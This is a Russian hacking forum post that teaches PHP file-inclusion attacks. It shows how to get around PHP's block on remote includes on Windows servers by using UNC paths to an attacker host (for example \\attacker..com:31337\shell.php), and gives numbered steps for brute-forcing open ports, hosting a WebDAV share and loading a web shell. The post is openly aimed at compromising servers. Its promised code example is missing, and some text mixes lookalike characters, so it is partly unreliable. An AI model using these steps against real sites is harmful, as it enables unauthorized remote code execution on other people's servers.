Показать сообщение отдельно

  #1  
Старый 09.09.2012, 16:17
kolyan243
Новичок
Регистрация: 11.05.2012
Сообщений: 5
Провел на форуме:
1289

Репутация: 0
По умолчанию

Кто незнает что такое "LFI" (это распространенная уязвимость с помощью которой мы можем подгрузить произвольный скрипт что бы он исполнился на веб-сервере)

Объясняю

Простейший пример скрипта на PHP будет выглядить следующим образом:

Таким образом если мы передадим такому скрипту в параметр "file" имя какого то ещё PhP скрипта ,то PHP при его исполнении попытается подгрузить скрипт из параметра и исполнить его.

Но нам нужно как "хакерам" не тупо что то подгрузить из функционала веб-приложения,нам нужен шелл и здесь нам надо подгрузить скрипт с нашим контентом .

Самый распространненый способ расположить наш PHP-шелл на каком нибудь веб-сервере и указать полный путь до файла

например:

http://attackег.com/shell.php

Но данный способ срабатывает нечасто,так как в конфигах РНР есть опция, запрещающая подгрузку удаленных файлов.

Все, что требуется для обхода ограничения, - это, во-первых,

чтобы веб-сервер с РНР был запущен под Windows, а во -вторых, указать путь до нашего файла в виде:

\\attackег..com\shell.php

0чень часто веб-серверы находятся за файрволами, а потому обратиться напрямую по шаре через интернет к веб-серверу нам вряд ли удастся.

Мы можем указать порт, по которому он к нам будет коннектиться:

\\attackег..com:31337\shell.php

Таким образом, мы можем пробрутить порты и найти, какой из

них разрешен.

Итак, мы имеем такую последовательность:

1. Понять, что 0С-Windows.

2. Поснифать на аttасkеr.соm трафик и, брутя порты,

пOнять, где есть дырка

3. Поднять на данном порту анонимный WebDAV или шару,

4. Выложить на нее шелл и подгрузить его.

5. Радоваться.=)=)=)=)

Вроде все.
 
Ответить с цитированием